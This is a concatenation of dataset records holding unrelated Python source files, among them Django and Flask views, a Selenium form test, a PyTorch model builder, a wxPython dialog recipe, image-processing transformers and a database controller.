request.user\n states = [*user.appuser.states.all()]\n groups = \", \".join(user.groups.all().values_list(\"name\", flat=True))\n\n # The JS currently only knows how to handle one state per user, so:\n state = None\n if states:\n state = states[0]\n\n program_names = \", \".join(state.program_names) if state else None\n program_text = f\"{state.code.upper} {program_names}\" if state else None\n\n user_data = {\n \"name\": state.name if state else None,\n \"abbr\": state.code.upper() if state else None,\n \"programType\": state.program_type if state else None,\n \"programName\": program_text,\n \"formName\": \"CARTS FY\",\n \"currentUser\": {\n \"role\": user.appuser.role,\n \"firstname\": user.first_name,\n \"lastname\": user.last_name,\n \"state\": {\n \"id\": state.code.upper() if state else None,\n \"name\": state.name if state else None,\n },\n \"username\": user.username,\n \"email\": user.email,\n \"group\": groups,\n },\n }\n return HttpResponse(json.dumps(user_data))\n\n\ndef _id_from_chunks(year, *args):\n def fill(chunk):\n chunk = str(chunk).lower()\n if chunk in 
string.ascii_lowercase:\n return chunk\n return chunk.zfill(2)\n\n chunks = [year] + [*args]\n\n return \"-\".join(fill(c) for c in chunks)\n\n\ndef _year_section_query_from_id(ident: str) -> List[int]:\n return [int(_) for _ in ident.split(\"-\")[:2]]\n\n\ndef _get_fragment_by_id(\n ident: str, contents: Union[Dict, List]\n) -> DatumInContext:\n pathstring = f\"$..*[?(@.id=='{ident}')]\"\n find_by_id = parse(pathstring)\n return find_by_id.find(contents)\n","sub_path":"frontend/api_postgres/carts/carts_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476970230","text":"'''\ncreated by carlo occhiena on dec 2020\n'''\n\nfrom selenium import webdriver #to handle chromium webdriver\n\n#load the chrome webdriver (get the right one from https://chromedriver.chromium.org/downloads)\nbrowser = webdriver.Chrome(\"D:\\yourpath\\chromedriver.exe\")\n\n'''\nTesting newsletter form \n'''\n\n\n#open the webpage\nbrowser.get(\"http://www.yoursite.com\")\n\n#login info\nmailID = browser.find_element_by_id(\"mce-EMAIL\")\nmailID.send_keys(\"ceo@mail.com\")\n\nnameID = browser.find_element_by_id(\"mce-NOME\")\nnameID.send_keys(\"super mario bros\")\n\nnameID.submit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"314708648","text":"'''Command_line application for training a neural network and predicting image type\nBuild_model file defines function to build the neural network\nreturns neural network\nAuthor: Saeed Sheikh\nDate: Oct 26 2018'''\n\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torchvision import models\n\ndef build_network(model_name, hidden_sizes):\n\n vgg19 = models.vgg19(pretrained = True)\n densenet161 = models.densenet161(pretrained = True)\n alexnet = models.alexnet(pretrained = True)\n\n models_dict = {'densenet': densenet161, 'alexnet': alexnet, 'vgg': vgg19}\n\n input_size = 0\n model = models_dict[model_name]\n\n if model_name == 'vgg':\n input_size = 25088\n elif model_name == 'densenet':\n input_size = 2208\n elif model_name == 'alexnet':\n input_size = 9216\n else:\n print('Unsupported model used or model architecture enter incorrectly')\n \n #Freezing parameters for features\n for param in model.parameters():\n param.requires_grad = False\n\n #Building classifier network using OrderedDict \n from collections import OrderedDict\n\n input_layer = input_size\n hidden_layers = hidden_sizes\n #Output size is set to 102 as model is beign trained to classify flower type out of 102 possible types\n output_size = 102\n\n from collections import OrderedDict\n classifier = nn.Sequential(OrderedDict([\n ('fc1', nn.Linear(input_layer, hidden_layers)),\n ('relu1', nn.ReLU()),\n ('fc2', nn.Linear(hidden_layers, output_size)),\n ('output', nn.LogSoftmax(dim=1))\n ]))\n\n\n model.classifier = classifier\n\n return model\n\n\n \n \n\n","sub_path":"build_model.py","file_name":"build_model.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"39982222","text":"#echo \"select position, count(*) from declarations_section group by position \" | mysql -h migalka -D disclosures_db -u disclosures -pdisclosures >positions.txt\nfrom robots.common.primitives import normalize_and_russify_anchor_text\nimport 
re\nfrom collections import defaultdict\nimport argparse\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--raw-positions\", dest='raw_positions', required=True)\n return parser.parse_args()\n\nclass TGraphCluster:\n\n def __init__(self, item, count):\n self.collocs = defaultdict(int)\n item = item.replace('\\\\n', ' ')\n item = normalize_and_russify_anchor_text(item)\n self.graphematical_key = re.sub('[ -]', '', item).lower()\n self.collocs[item] += count\n\n def get_total_sum(self):\n return sum(v for v in self.items.values())\n\n def get_max_item(self):\n best = \"\"\n max_v = 0\n for k, v in self.collocs.items():\n if v > max_v:\n best = k\n max_v = v\n return best\n\n def add_cluster(self, c):\n for k,v in c.collocs.items():\n self.collocs[k] += v\n\n\nif __name__ == '__main__':\n args = parse_args()\n graph_buckets = dict()\n with open (args.raw_positions) as inp:\n for line in inp:\n line = line.strip()\n items = line.split(\"\\t\")\n if len(items) == 1:\n continue\n position_str, count = items\n if count == \"count(*)\":\n continue\n c = TGraphCluster(position_str, int(count))\n\n if c.graphematical_key in graph_buckets:\n graph_buckets[c.graphematical_key].add_cluster(c)\n else:\n graph_buckets[c.graphematical_key] = c\n\n for b in graph_buckets.values():\n print (\"key={}, best={}\".format(b.graphematical_key, b.get_max_item()))\n for k,v in b.collocs.items():\n print (\"\\t{}\\t{}\".format(k, v))\n\n","sub_path":"tools/disclosures_site/scripts/positions.py","file_name":"positions.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"104805266","text":"# -*- coding: utf-8 -*-\r\nfrom flask import Flask, url_for, render_template, request, redirect, session\r\nfrom symptomaddform import SymptomAddForm\r\nfrom symptommodel import SymptomModel\r\nfrom illnessmodel import IllnessModel\r\nfrom predictform import PredictForm\r\nfrom shutil import copy\r\nfrom db import DB\r\n\r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = 'codeday'\r\n\r\nsymptoms_db = DB('symptoms.db')\r\nsymptoms_init = SymptomModel(symptoms_db.get_connection())\r\nsymptoms_init.init_table()\r\n\r\nillnesses_db = DB('illnesses.db')\r\nillnesses_init = IllnessModel(illnesses_db.get_connection())\r\nillnesses_init.init_table()\r\n\r\n\r\n@app.route('/addsymptom', methods=['GET', 'POST'])\r\ndef addsymptom():\r\n \r\n form = SymptomAddForm()\r\n \r\n if form.validate_on_submit():\r\n symptom = form.symptom.data\r\n illness = form.illness.data\r\n \r\n illness_model = IllnessModel(illnesses_db.get_connection())\r\n illness_id = illness_model.exists(illness)[1] \r\n \r\n symptom_model = SymptomModel(symptoms_db.get_connection())\r\n data = symptom_model.exists(symptom) \r\n \r\n if not data[0]: \r\n symptom_model.insert(symptom, illness, illness_id)\r\n return redirect(\"/addsymptom\")\r\n return render_template('addsymptom.html', title='Add Symptom', form=form)\r\n\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef predict():\r\n \r\n form = PredictForm()\r\n \r\n if form.validate_on_submit():\r\n \r\n data = []\r\n \r\n symptom_model = SymptomModel(symptoms_db.get_connection())\r\n illness_model = IllnessModel(illnesses_db.get_connection()) \r\n \r\n symptom1 = form.symptom1.data\r\n data.append(symptom_model.exists(symptom1)[0])\r\n symptom2 = form.symptom2.data\r\n data.append(symptom_model.exists(symptom2)[0])\r\n symptom3 = form.symptom3.data\r\n 
data.append(symptom_model.exists(symptom3)[0])\r\n symptom4 = form.symptom4.data\r\n data.append(symptom_model.exists(symptom4)[0])\r\n symptom5 = form.symptom5.data \r\n data.append(symptom_model.exists(symptom5)[0]) \r\n\r\n cooler_data = 'Q'.join(data)\r\n\r\n return redirect('/prediction/' + str(cooler_data))\r\n \r\n return render_template('predict.html', title='Health Predictor', form=form)\r\n\r\n@app.route('/prediction/')\r\ndef prediction(data):\r\n \r\n illness_model = IllnessModel(illnesses_db.get_connection())\r\n \r\n real_data = list(map(int, data.split('Q')))\r\n\r\n illnesses = []\r\n for i in real_data:\r\n illness = illness_model.get(i)\r\n if illness != 'no illness':\r\n illnesses.append(illness)\r\n \r\n illnesses.sort()\r\n print(illnesses)\r\n cur = 1\r\n q = []\r\n for i in range(1, len(illnesses)):\r\n if illnesses[i] == illnesses[i - 1]:\r\n cur += 1\r\n else:\r\n q.append((illnesses[i - 1], cur))\r\n cur = 1 \r\n if illnesses[-1] == illnesses[-2]:\r\n q.append((illnesses[-1], cur))\r\n else:\r\n q.append((illnesses[-1], 1))\r\n \r\n for i in q:\r\n print(i[0], str(int(i[1]/len(illnesses) * 100)) + '%')\r\n \r\n return render_template('index.html', title='Health Predictor')\r\n\r\n@app.route('/')\r\n@app.route('/index')\r\ndef index():\r\n \r\n\r\n return render_template('index.html', title='Health Predictor')\r\n\r\nif __name__ == '__main__':\r\n app.run(port=8000, host='127.0.0.1')","sub_path":"hackathon/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"242890837","text":"def check_div(a):\n if (a%3==0 or a%5==0):\n return True\n else:\n \treturn False\n\nsum=0\nfor i in range(1,1000):\n if check_div(i):\n sum+=i\n\nprint (sum)\n","sub_path":"1/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"61256793","text":"#!/usr/bin/env python\n#coding:utf-8\n\nfrom .base import BasicAdapter\nfrom toughradius.common import tools\nfrom hashlib import md5\nimport urllib2\nimport json\n\nclass RestError(BaseException):pass\n\nclass RestAdapter(BasicAdapter):\n\n def makeSign(self,message):\n secret = tools.safestr(self.config.adapters.rest.secret)\n emsg = tools.safestr(message)\n return md5( emsg + secret ).hexdigest()\n\n def send(self,req):\n url = self.config.adapters.rest.url\n msg = json.dumps(req.dict_message)\n sign = self.makeSign(msg)\n try:\n req = urllib2.Request('%s?sign=%s'%(url,sign),msg)\n resp = urllib2.urlopen(req)\n return json.loads(resp.read())\n except:\n self.logger.exception(\"send rest request error\")\n raise RestError(\"rest request error\")\n\n","sub_path":"toughradius/radiusd/adapters/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"357385578","text":"questions = ['13+9=?',\r\n '25-4=?',\r\n '6+7=?',\r\n '18-5=?',\r\n '30+31=?',\r\n '71-10=?',\r\n '1+5=?',\r\n '9-3=?',\r\n '65-4=?',\r\n '15+6=?',\r\n '20-1=?',\r\n '29-10=?',\r\n '10+9=?',\r\n '69-8=?'\r\n ]\r\n \r\nanswers = ['21', '13', '6', '61', '19',\r\n 'twenty one', 'twenty-one',\r\n 'thirteen',\r\n 'six',\r\n 'sixty one', 'sixty-one',\r\n 'nineteen', 'nine-teen',\r\n '970x']\r\n\r\r\ndef keyword_search(keywords, lang='ch'):\r\n if lang.lower() == 'ch':\r\n return((set(Post.objects.filter(text__contains=keyword)) for 
keyword in keywords))\r\n elif lang.lower() == 'en':\r\n return((set(Post.objects.filter(text_eng__contains=keyword)) for keyword in keywords))\r\n \r\n","sub_path":"article/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"557013262","text":"# Chapter 7: Window Layout and Design\r\n# Recipe 4: Standard Dialog Button Sizer\r\n#\r\nimport wx\r\n\r\n#---- Recipe Code ----#\r\n\r\nclass CustomMessageBox(wx.Dialog):\r\n def __init__(self, parent, message, title=\"\",\r\n bmp=wx.NullBitmap, style=wx.OK):\r\n super(CustomMessageBox, self).__init__(parent, title=title)\r\n\r\n # Attributes\r\n self._flags = style\r\n self._bitmap = wx.StaticBitmap(self, bitmap=bmp)\r\n self._msg = wx.StaticText(self, label=message)\r\n\r\n # Layout\r\n self.__DoLayout()\r\n self.SetInitialSize()\r\n self.CenterOnParent()\r\n\r\n def __DoLayout(self):\r\n vsizer = wx.BoxSizer(wx.VERTICAL)\r\n hsizer = wx.BoxSizer(wx.HORIZONTAL)\r\n\r\n # Layout the bitmap and caption\r\n hsizer.AddSpacer(10)\r\n hsizer.Add(self._bitmap, 0, wx.ALIGN_CENTER_VERTICAL)\r\n hsizer.AddSpacer(8)\r\n hsizer.Add(self._msg, 0, wx.ALIGN_CENTER_VERTICAL)\r\n hsizer.AddSpacer(10)\r\n\r\n # Create the buttons specified by the style flags\r\n # and the StdDialogButtonSizer to manage them\r\n btnsizer = self.CreateButtonSizer(self._flags)\r\n\r\n # Finish the layout\r\n vsizer.AddSpacer(10)\r\n vsizer.Add(hsizer, 0, wx.ALIGN_CENTER_HORIZONTAL)\r\n vsizer.AddSpacer(8)\r\n vsizer.Add(btnsizer, 0, wx.EXPAND|wx.ALL, 5)\r\n\r\n self.SetSizer(vsizer)\r\n\r\n#---- End Recipe Code ----#\r\n\r\nclass ButtonSizerApp(wx.App):\r\n def OnInit(self):\r\n self.frame = ButtonSizerFrame(None,\r\n title=\"Button Sizer\")\r\n self.frame.Show()\r\n return True\r\n\r\nclass ButtonSizerFrame(wx.Frame):\r\n def __init__(self, parent, *args, **kwargs):\r\n wx.Frame.__init__(self, parent, *args, **kwargs)\r\n\r\n # Attributes\r\n self.panel = ButtonSizerPanel(self)\r\n\r\n # Layout\r\n sizer = wx.BoxSizer(wx.VERTICAL)\r\n sizer.Add(self.panel, 1, wx.EXPAND)\r\n self.SetSizer(sizer)\r\n self.SetInitialSize()\r\n\r\nclass ButtonSizerPanel(wx.Panel):\r\n def __init__(self, parent, *args, **kwargs):\r\n wx.Panel.__init__(self, parent, *args, **kwargs)\r\n\r\n # Attributes\r\n self.button = wx.Button(self, label=\"Show Dialog\")\r\n\r\n # Layout\r\n sizer = wx.BoxSizer(wx.VERTICAL)\r\n sizer.AddStretchSpacer()\r\n hsizer = wx.BoxSizer()\r\n hsizer.AddStretchSpacer()\r\n hsizer.Add(self.button, 0, wx.ALL, 20)\r\n hsizer.AddStretchSpacer()\r\n sizer.Add(hsizer, 0, wx.EXPAND)\r\n sizer.AddStretchSpacer()\r\n self.SetSizer(sizer)\r\n\r\n # Event Handlers\r\n self.Bind(wx.EVT_BUTTON, self.OnShowDlg, self.button)\r\n\r\n def OnShowDlg(self, event):\r\n \"\"\"Shows the dialog when our button is clicked\"\"\"\r\n msg = \"Look at how my buttons are in the right places!\"\r\n bmp = wx.Bitmap(\"./face-monkey.png\")\r\n dlg = CustomMessageBox(self, msg, \"Button Sizer\", bmp,\r\n style=wx.OK|wx.CANCEL)\r\n dlg.ShowModal()\r\n\r\nif __name__ == '__main__':\r\n app = ButtonSizerApp(False)\r\n app.MainLoop()\r\n","sub_path":"wxPython Test/wxPython 2.8 Application Development Cookbook Source Code/1780_07_Code/04/btnsizer.py","file_name":"btnsizer.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"595225880","text":"import numpy as np\nfrom network import Network\n\n# 
training data with 2 input values and the 1 expected output value -> logical AND\nTRAINING_DATA_1 = np.array([\n (0, 0, 0),\n (0, 1, 0),\n (1, 0, 0),\n (1, 1, 1)\n])\n\nNUM_INPUTS_1 = 2\nNUM_OUTPUTS_1 = 1\n\n# training data with 8 inputs and the 3 expected output values -> binary encoding\nTRAINING_DATA_2 = np.array([\n (1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),\n (0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1),\n (0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0),\n (0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1),\n (0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0),\n (0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1),\n (0, 0, 0, 0, 0, 0, 1, 0, 1, 1, 0),\n (0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1),\n])\n\nNUM_INPUTS_2 = 8\nNUM_OUTPUTS_2 = 3\n\nNUM_ITERATIONS = 1000\n\nif __name__ == \"__main__\":\n\n # network initialisation\n learning_rate = 0.1\n network = Network(NUM_INPUTS_2, learning_rate)\n # add a hidden layer with 4 units\n network.add_layer(4)\n # add an output layer\n network.add_layer(NUM_OUTPUTS_2)\n\n # print(\"created network:\\n%s\" % network)\n\n for i in range(NUM_ITERATIONS):\n\n print(\"iteration:\", i)\n\n for data in TRAINING_DATA_2:\n input = data[:NUM_INPUTS_2]\n label = np.array(data[NUM_INPUTS_2:])\n print(\"input: %s, label: %s\" % (input, label))\n\n network.forward_propagation(input)\n print(\"network output:\", network.outputs)\n\n network.back_propagation(label)\n network.update_weights()\n\n # print(\"updated network:\\n%s\" % network)\n\n print(\"\\n\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"427540324","text":"#from django.core.urlresolvers import reverse\n\nfrom menu import Menu, MenuItem\n\ndef profile_title(request):\n \"\"\"\n Return a personalized title for our profile menu item\n \"\"\"\n # we don't need to check if the user is authenticated because our menu\n # item will have a check that does that for us\n name = request.user.get_full_name() or request.user\n return \"%s's Profile\" % name\n\n# Add two items to our main menu\nMenu.add_item(\"main\", MenuItem(\"Tools\",\n reverse(\"django.contrib.auth.views.login\"),\n weight=10,\n icon=\"tools\"))\nMenu.add_item(\"main\", MenuItem(\"Reports\",\n reverse(\"django.contrib.auth.views.login\"),\n weight=20,\n icon=\"report\"))\n# Define children for the my account menu\nmyaccount_children = (\n MenuItem(\"Edit Profile\",\n reverse(\"django.contrib.auth.views.login\"),\n weight=10,\n icon=\"user\"),\n MenuItem(\"Admin\",\n reverse(\"admin:index\"),\n weight=80,\n separator=True,\n check=\n lambda\n request: request.user.is_superuser),\n MenuItem(\"Logout\",\n reverse(\"django.contrib.auth.views.logout_then_login\"),\n weight=90,\n separator=True,\n icon=\"user\"),\n )\n# Add a My Account item to our user menu\nMenu.add_item(\"user\", MenuItem(\"My Account\",\n reverse(\"django.contrib.auth.views.login\"),\n weight=10,\n children=myaccount_children))\n","sub_path":"paraiso/peluqueria/menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"562738191","text":"from __future__ import (absolute_import, division, print_function)\n\nfrom collections import namedtuple\nfrom functools import partial\nfrom itertools import izip\n\nimport cv2\nimport numpy as np\nfrom sklearn.base import TransformerMixin, BaseEstimator\n\nfrom scpye.track.bounding_box import extract_bbox\n\nMaskedData = namedtuple('MaskedData', ['data', 
'mask'])\n\n\ndef forward_list(func):\n \"\"\"\n Decorator that output a list if input is list\n Currently only handles class member function\n :param func:\n \"\"\"\n\n def func_wrapper(self, X, y=None):\n if y is None:\n if isinstance(X, list):\n return [func(self, each_X) for each_X in X]\n else:\n return func(self, X)\n else:\n if isinstance(X, list):\n # Make sure y corresponds to X\n if not isinstance(y, list):\n raise TypeError('y is not a list')\n if len(X) != len(y):\n raise ValueError('X and y not same length')\n\n Xts, yts = [], []\n for each_X, each_y in izip(X, y):\n if each_y is None:\n raise ValueError('y is None')\n Xt, yt = func(self, each_X, each_y)\n Xts.append(Xt)\n yts.append(yt)\n return Xts, yts\n else:\n return func(self, X, y)\n\n return func_wrapper\n\n\nclass ImageTransformer(BaseEstimator, TransformerMixin):\n func = None\n\n def fit_transform(self, X, y=None, **fit_params):\n # Because fit returns self, here fit does nothing\n if y is None:\n # fit method of arity 1 (unsupervised transformation)\n return self.fit(X, **fit_params).transform(X)\n else:\n # fit method of arity 2 (supervised transformation)\n return self.fit(X, y, **fit_params).transform(X, y)\n\n def fit(self, X, y=None, **fit_params):\n return self\n\n @forward_list\n def transform(self, X, y=None):\n \"\"\"\n transform function which dispatches work to other functions\n \"\"\"\n self._pre_transform(X, y)\n\n if y is None:\n return self._transform_X(X)\n else:\n return self._transform_Xy(X, y)\n\n def _pre_transform(self, X, y=None):\n \"\"\"\n Pre-transform some of the data so that it can be used later\n \"\"\"\n pass\n\n def _transform_X(self, X):\n \"\"\"\n Transform X to Xt\n \"\"\"\n Xt = self.func(X)\n return Xt\n\n def _transform_Xy(self, X, y=None):\n \"\"\"\n Transform X to Xt and y to yt\n \"\"\"\n Xt = self.func(X)\n yt = self.func(y)\n return Xt, yt\n\n\nclass ImageRotator(ImageTransformer):\n def __init__(self, ccw=-1):\n \"\"\"\n Rotate image n times counter-clockwise\n :param ccw: number of counter-clockwise rotations\n :type ccw: int\n \"\"\"\n self.ccw = ccw\n self.func = partial(np.rot90, k=self.ccw)\n\n\nclass ImageCropper(ImageTransformer):\n def __init__(self, bbox=None):\n \"\"\"\n Crop image to bounding box\n :param bbox:\n \"\"\"\n self.bbox = bbox\n self.func = partial(extract_bbox, bbox=self.bbox)\n\n\nclass ImageResizer(ImageTransformer):\n def __init__(self, k=0.5):\n \"\"\"\n Resize image by k\n :param k:\n \"\"\"\n self.k = k\n self.func = partial(cv2.resize, dsize=None, fx=self.k, fy=self.k,\n interpolation=cv2.INTER_NEAREST)\n\n\nclass ImageSmoother(ImageTransformer):\n def __init__(self, ksize=5, sigma=1):\n \"\"\"\n Smooth image with gaussian blur, only applied on image, not on label\n :param ksize: kernel size\n :param sigma: sigma\n \"\"\"\n self.ksize = ksize\n self.sigma = sigma\n self.func = partial(cv2.GaussianBlur, ksize=(self.ksize, self.ksize),\n sigmaX=self.sigma)\n\n # special case when y is not transformed (blurred)\n def _transform_Xy(self, X, y=None):\n Xt = self.func(X)\n yt = y\n return Xt, yt\n\n\ndef split_label(label):\n \"\"\"\n :param label:\n :return: split label\n :rtype: numpy.ndarray\n \"\"\"\n assert np.ndim(label) == 3 and np.size(label, axis=-1) == 2\n return label[:, :, 0] > 0, label[:, :, 1] > 0\n\n\nclass DarkRemover(ImageTransformer):\n def __init__(self, pmin=25):\n \"\"\"\n Remove dark pixels in image\n :param pmin: minimum value in gray scale image\n :type pmin: int\n \"\"\"\n assert 0 <= pmin < 255, \"pmin should be in [0, 
255)\"\n self.v_min = pmin\n\n self.mask = None\n\n def _pre_transform(self, X, y=None):\n gray = cv2.cvtColor(X, cv2.COLOR_BGR2GRAY)\n self.mask = gray > self.v_min\n\n def _transform_X(self, X):\n return MaskedData(data=X, mask=self.mask)\n\n def _transform_Xy(self, X, y=None):\n neg, pos = split_label(y)\n neg_mask = self.mask & neg\n pos_mask = self.mask & pos\n\n y_neg = np.zeros(np.count_nonzero(neg_mask))\n y_pos = np.ones(np.count_nonzero(pos_mask))\n\n labels = np.dstack((neg_mask, pos_mask))\n yt = np.hstack((y_neg, y_pos))\n\n return MaskedData(data=X, mask=labels), yt\n","sub_path":"scpye/detect/image_transformer.py","file_name":"image_transformer.py","file_ext":"py","file_size_in_byte":5302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"281999712","text":"import re\nletters = {'к', 'п', 'т', 'с', 'ф', 'х', 'ц', 'ч', 'ш'}\nletters1 = set()\nwhile True:\n seq = input('Введите последовательность слов русского алфавита, разделяйте '\n 'запятой, в конце точка: ')\n seq = seq.lower()\n if re.search('[а-я]', seq):\n if re.search(',', seq):\n if seq.endswith('.'):\n seq = seq.replace('.', '')\n seq = seq.split(', ')\n seq = set(seq)\n seq1 = seq.copy()\n n = 0\n for i in seq1:\n n += 1\n if n % 2 == 0:\n seq.remove(i)\n else:\n pass\n for j in seq:\n for c in j:\n if c in letters:\n letters1.add(c)\n let = sorted(letters1)\n let1 = ' '.join(let)\n print(let1)\n\n else:\n print('postav tochku')\n else:\n print('postav komu')\n else:\n print('ruskimi pishi')\n ex = input('Для продолжения нажмите Enter...')\n if ex != '':\n break\n","sub_path":"laba 2/Б.py","file_name":"Б.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"512615078","text":"# AVL Mode Package\n# Released under MIT License\n# Copyright (c) 2020 TytusDb Team\n# Developers: SG#16\n\n\nfrom ..DataAccessLayer import reports\nfrom .. 
import avlMode as AVLTreeStructure\nfrom ..DataAccessLayer.handler import Handler\n\n\nclass Controller:\n\n def __init__(self):\n self.structure = AVLTreeStructure\n\n def execute(self, args, action):\n try:\n actions = Enums.actions\n\n # region Database\n if action == actions[1]:\n return self.structure.createDatabase(args[0])\n elif action == actions[2]:\n tmp = self.structure.showDatabases()\n print(\"Databases:\")\n print(tmp)\n return tmp\n elif action == actions[3]:\n return self.structure.alterDatabase(args[0], args[1])\n elif action == actions[4]:\n return self.structure.dropDatabase(args[0])\n # endregion\n\n # region Tables\n elif action == actions[5]:\n return self.structure.createTable(args[0], args[1], int(args[2]))\n elif action == actions[6]:\n tmp = self.structure.showTables(args[0])\n print(\"Tables from \" + args[0] + \":\")\n print(tmp)\n return tmp\n elif action == actions[7]:\n tmp = self.structure.extractTable(args[0], args[1])\n print(\"Data from \" + args[0] + \"\\\\\" + args[1] + \":\")\n print(tmp)\n return tmp\n elif action == actions[8]:\n tmp = self.structure.extractRangeTable(args[0], args[1], int(args[2]), args[3], args[4])\n print(\"Data from \" + args[0] + \"\\\\\" + args[1] + \" with range \" + args[3] + \" - \" + args[4])\n print(tmp)\n return tmp\n elif action == actions[9]:\n return self.structure.alterAddPK(args[0], args[1], list(map(int, args[2].split(','))))\n elif action == actions[10]:\n return self.structure.alterDropPK(args[0], args[1])\n elif action == actions[13]:\n return self.structure.alterTable(args[0], args[1], args[2])\n elif action == actions[14]:\n return self.structure.alterAddColumn(args[0], args[1], args[2])\n elif action == actions[15]:\n return self.structure.alterDropColumn(args[0], args[1], int(args[2]))\n elif action == actions[16]:\n return self.structure.dropTable(args[0], args[1])\n # endregion\n\n # region Tuples\n elif action == actions[17]:\n return self.structure.insert(args[0], args[1], args[2].split(','))\n elif action == actions[18]:\n tmp = self.structure.loadCSV(args[0], args[1], args[2])\n print(\"csv:\")\n print(tmp)\n return tmp\n elif action == actions[19]:\n tmp = self.structure.extractRow(args[0], args[1], list(map(int, args[2].split(','))))\n print(\"Tuple from \" + args[0] + \"\\\\\" + args[1] + \":\")\n print(tmp)\n return tmp\n elif action == actions[20]:\n return self.structure.update(args[0], args[1], args[2], list(map(int, args[3].split(','))))\n elif action == actions[21]:\n return self.structure.delete(args[0], args[1], list(map(int, args[2].split(','))))\n elif action == actions[22]:\n return self.structure.truncate(args[0], args[1])\n elif action == actions[23]:\n self.structure.dropAll()\n # endregion\n else:\n return 6\n except:\n return 7\n\n @staticmethod\n def reportDB():\n return reports.graphicDatabases()\n\n @staticmethod\n def reportTBL(database: str):\n return reports.graphicTables(database)\n\n @staticmethod\n def reportAVL(database: str, table: str):\n return reports.graphAVL(database, table)\n\n @staticmethod\n def reportTPL(database: str, table: str, llave):\n return reports.graphTuple(database, table, llave)\n\n @staticmethod\n def getIndexes(database: str, table: str):\n avl_temp = Handler.tableinstance(database, table)\n return avl_temp.indexes()\n\n\nclass Enums:\n actions = {\n 1: \"Create database\",\n 2: \"Show databases\",\n 3: \"Alter database\",\n 4: \"Drop database\",\n 5: \"Create table\",\n 6: \"Show tables\",\n 7: \"Extract table\",\n 8: \"Extract range\",\n 9: \"Alter 
add PK\",\n 10: \"Alter drop PK\",\n 11: \"Alter add FK\",\n 12: \"Alter add index\",\n 13: \"Alter table\",\n 14: \"Add column\",\n 15: \"Drop column\",\n 16: \"Drop table\",\n 17: \"Insert\",\n 18: \"Load CSV\",\n 19: \"Extract row\",\n 20: \"Update\",\n 21: \"Delete\",\n 22: \"Truncate\",\n 23: \"Format DMS\"\n }\n","sub_path":"storage/fase2/team18/storage/avl/View/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":5004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"135633177","text":"# Copyright (c) 2015, Alphamonak Solutions Ltd.\n\n\nfrom __future__ import unicode_literals\n\nno_sitemap = 1\nno_cache = 1\nbase_template_path = \"templates/pages/desk.html\"\n\nimport os, re\nimport redapp\nfrom redapp import _\nimport redapp.sessions\n\ndef get_context(context):\n\tif (redapp.session.user == \"Guest\" or\n\t\tredapp.db.get_value(\"User\", redapp.session.user, \"user_type\")==\"Website User\"):\n\t\tredapp.throw(_(\"You are not permitted to access this page.\"), redapp.PermissionError)\n\n\thooks = redapp.get_hooks()\n\tboot = redapp.sessions.get()\n\n\t# this needs commit\n\tcsrf_token = redapp.sessions.get_csrf_token()\n\n\tredapp.db.commit()\n\n\tboot_json = redapp.as_json(boot)\n\n\t# remove script tags from boot\n\tboot_json = re.sub(\"\\[^<]*\\\", \"\", boot_json)\n\n\treturn {\n\t\t\"build_version\": get_build_version(),\n\t\t\"include_js\": hooks[\"app_include_js\"],\n\t\t\"include_css\": hooks[\"app_include_css\"],\n\t\t\"boot\": boot if context.get(\"for_mobile\") else boot_json,\n\t\t\"csrf_token\": csrf_token,\n\t\t\"background_image\": boot.user.background_image or boot.default_background_image,\n\t\t\"google_analytics_id\": redapp.conf.get(\"google_analytics_id\")\n\t}\n\n@redapp.whitelist()\ndef get_desk_assets(build_version):\n\t\"\"\"Get desk assets to be loaded for mobile app\"\"\"\n\tdata = get_context({\"for_mobile\": True})\n\tassets = [{\"type\": \"js\", \"data\": \"\"}, {\"type\": \"css\", \"data\": \"\"}]\n\n\tif build_version != data[\"build_version\"]:\n\t\t# new build, send assets\n\t\tfor path in 